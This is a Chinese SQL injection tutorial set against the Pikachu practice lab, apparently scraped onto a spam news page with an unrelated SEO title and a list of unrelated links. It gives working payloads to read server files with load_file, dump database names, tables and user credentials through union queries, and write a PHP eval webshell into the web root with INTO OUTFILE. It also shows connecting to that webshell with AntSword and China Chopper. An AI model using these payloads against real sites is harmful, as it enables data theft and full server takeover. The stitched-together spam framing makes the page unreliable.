当前位置: 首页 > news >正文

网站流量怎么做乡1万做一个手机app大概需要多少钱

网站流量怎么做乡1万,做一个手机app大概需要多少钱,wordpress主题哪个好看,济南全网推广设计开发前言 本篇博客主要是通过piakchu靶场来讲解如何通过SQL注入漏洞来写入文件#xff0c;读取文件。通过SQL输入来注入木马来getshell等#xff0c;讲解了比较详细的过程#xff1b; 如果想要学习SQL注入原理以及如何进行SQL注入#xff0c;我也写了一篇详细的SQL注入方法及…前言 本篇博客主要是通过piakchu靶场来讲解如何通过SQL注入漏洞来写入文件读取文件。通过SQL输入来注入木马来getshell等讲解了比较详细的过程 如果想要学习SQL注入原理以及如何进行SQL注入我也写了一篇详细的SQL注入方法及原理链接如下 【超详细】你知道什么是SQL注入吗直到如何通过SQL注入来控制目标服务器吗一篇文章教你sql注入漏洞的原理及方法----sql注入【上】_ANii_Aini的博客-CSDN博客SQL注入漏洞详解。包括原理分类比如数字型字符型搜索型xx型宽字节注入报错注入盲注有无回显等各种注入payload以及产生原因等等https://blog.csdn.net/m0_67844671/article/details/133031125 一SQL注入读取文件或数据库数据 主要用pikachu靶场演示 1-1 读取文件数据 前提条件 ## 1、通过信息收集获取到想要读取的目标文件的真实物理路径 ## 2、mysql开启了secure_file_priv这个配置 如何开启mysql的secure_file_priv这个配置呢  找个空白地方协商这个配置即可 然后重启mysql服务即可生效。  读取文件借助mysql自带的功能函数load_file 比如我们先在根目录写一个文件aini.txt的文件 现在要读取这个文件 根路径为C:\tools\phpstudy\PHPTutorial\WWW 先用终端演示用物理机终端连上靶机的数据库 先授权在靶机打开数据库命令行 先输入密码进入数据库终端然后授权远程主机登录 授权代码行解释 grant all   ---------- 表示给予所有权限 on  x.x    ----------- 所有库所有表 pikachu.*表示piakchu所有表pikachu.user表示只能操作pikachu库的user表 to root192.168.31.% ------- 表示可以以root用户的身份在192.168.31段主机上登录 indentified by aini  登录的验证密码为 aini 授权完就可以用物理机终端进入如果不想用物理机的也可以直接在靶机上操作  读取文件的代码用load_file函数别忘了用\对路径里的\进行转义  select load_file(C:\\tools\\phpstudy\\PHPTutorial\\WWW\\aini.txt); 测试union联合查询语句 select id,email from member where username vince union select 1,load_file(C:\\tools\\phpstudy\\PHPTutorial\\WWW\\aini.txt); 用网站SQL注入漏洞去注入 以pikachu靶场为例 payload为 vince union select 1,load_file(C:\\tools\\phpstudy\\PHPTutorial\\WWW\\aini.txt);# 通过联合查询成功读取到了服务器文件  1-2 读取数据库数据 1-2-1 判断查询的字段个数 order by 1,2,3-- #报错表示字段个数小于3个那么减少一个字段来尝试order by 1,2--   #不报错表示字段个数为2个如果还报错那么继续减少一个来尝试 order by 1,2#order by 1,2,3# payload为  vine order by 1,2,3;# 表示位置的列数3表名3是多余的后端查询语句中不是三个字段那就改payload,改为如下  vince order by 1,2;# 表示这个字符型注入的查询后台select语句后面查询的是2个字段数据那么我们就知道通过union联合查询的时候查询的数据是2个字段数据了。 1-2-2 查询当前数据库名、用户名、版本等信息 union select user(),version();# 1-2-3 获取mysq所有库名 union select 1,group_concat(schema_name) from information_schema.schemata;# ## 浏览器地址栏要URL编码表单直接#或者 -- 就可以union select 1,group_concat(schema_name) from information_schema.schemata;# #和 -- mysql的注释符号 注意--前面有空格 1-2-4 获取pikachu库的所有表名 union select 1,group_concat(table_name) from information_schema.tables where table_schemadatabase()-- union select 1,group_concat(table_name) from information_schema.tables where table_schema database()# 1-2-5 获取表中的字段名 union select 1,group_concat(column_name) from information_schema.columns where table_name0x7573657273;#1-2-6 获取所有字段数据 union select 1,group_concat(id,0x7c,username,0x7c,password,0x7c,level,0x7c) from users;# ## 其中0x7c表示|我这里就是为了通过|来拼接每个数据。group_concat类似于concat也是做字符串拼接的是MySQL的一个内置函数  1-3 getshell 1-3-1 木马利用试验 1-1 准备木马 首先在站点根目录创建一个aini.php文件写入一句话木马 ?php eval($_POST[aini]);?   ------  注意里面写的 aini 是连接密码可以任意指定 1-2 用工具连接木马  ## 菜刀、蚁剑、冰蝎、哥斯拉四大木马利用神器现在推荐冰蝎和蚁剑功能更好一些如果需要工具可以留言 用蚁剑 进行连接 注意连接密码是写一句话木马的时候 指定的连接密码 写好了以后点击测试连接然后点击右上角添加即可 双击就就可以成功拿到对方服务器了 右击还有很多别的功能数据库操作文件操作等不细讲了 以后专门写一篇博客介绍这些一句话木马利用工具的利用过程 接下来用菜刀这款工具使一下  右击添加也行编辑也行 填写地址和连接木马以后点右下角‘编辑’即可 双击就可以拿到对方服务器了 这就是一句话木马的简单利用 1-3-2 通过注入点进行木马注入 2-1 通过注入点写入木马程序的前提条件 1. mysql开启了secure_file_priv的配置 ---- 如何开启前面讲过了2. 要知道网站代码的真实物理路径 ---------- 需要信息收集通过别的方法来直到真实路径3. 物理路径具备写入权限 ----------- 要不然木马写不进去4. 最好是mysql的root用户这个条件非必须但是有最好 2-2 通过注入点写入木马程序 union select ?php xx($_POST[aini]);?,2 into outfile C:\\phpStudy\\PHPTutorial\\WWW\\muma.php;# union select ?php eval($_POST[aini]);?,2 into outfile C:\\tools\\phpStudy\\PHPTutorial\\WWW\\muma.php;### xx表示eval因为直接写eval我们的这个md文档会被杀软杀掉的。 我用第二条payload 向根路径写入了一个muma.php文件  报了个warning不过我们去看一下靶机根路径有没有写入成功 写入成功了 我们用工具利用一下看看 成功了所以在真实SQL注入环境中看看能不能通过注入一句户木马来控制目标主机 2-3 获得后台真实物理路径的方法 ## 1、收集站点敏感目录比如phpinfo.php探针文件是否可以访问到 ## 2、站点网址输入一些不存在的网址或者加一些非法参数数据让网站报错看错误信息中是否存在路径信息3、指纹信息收集     ## nginx默认站点目录 /usr/share/nginx/html配置文件路径/etc/nginx/nginx.conf     ## apache默认站点目录/var/www/html     ... ## 4、通过站点其他漏洞来获取配置信息、真实物理路径信息比如如果发现远程命令执行漏洞(后面会讲到各种其他漏洞)针对php的站点直接执行一个phpinfo()函数可以看到phpinfo.php所展示的各种信息等等。 ## 5、其他思路反正就是不断的尝试。 mysql数据库的SQL注入就分享到这里如果需要靶场环境或者工具可以留言 若有不懂的地方可以留言欢迎技术交流
http://www.yayakq.cn/news/4560/

相关文章:

  • 泉州住房和城乡建设网站策划与设计一个电子商务网站
  • 珠海做网站找哪家公司个人网站建设目标
  • 做网站用的字体是什么所有浏览器大全图片
  • dw做网站需要数据库么免费咨询服务协议
  • 医疗器械外贸网站建设网站前台功能介绍
  • 做包装盒效果图的网站做外贸网站流程
  • 培训网站建设方案模板微商城网站建设怎么样
  • 做网站企业logo 图标 设计
  • 北京企业网站seo平台网络服务器搭建配置与管理 下载
  • 网站建设有哪些软件有哪些wordpress怎么pjax
  • 网站提示404error近期的重大新闻
  • 企业网站备案材料网站主办者是谁
  • 网站建设技术方面论文天津建设工程信息网 招标发布软件
  • 如何做旅游网站的思维导图基于多站点的网站内容管理平台的管理与应用
  • 网站搭建多少钱logo修改wordpress如何添加备案号代码
  • 无锡企业建站模板做网站天通苑
  • 设计网站推荐 猪抖音代运营赚钱吗
  • wap网站建设设计农业网站建设费用预算
  • 建个官方网站要多少钱电商类网站
  • 思明区建设局官网站邢台网站建设公司哪家好一点
  • 万州哪里有做网站的网站建设两个方面
  • 做网站的出路建设机械网站公司
  • 外贸网站运营工作内容启闭机闸门的网站建设
  • 东莞 外贸网站设计百度seo推广
  • 网站建设设计思想简单介绍家乡网页html代码
  • vps网站空间wordpress的模板
  • 东莞网站建设找谁长沙网页美工培训
  • 怎么做冒牌网站如何看网站是不是织梦做的
  • 家居网站建设渠道广州城乡建设网站
  • 做企业网站和邮箱做网站搜索框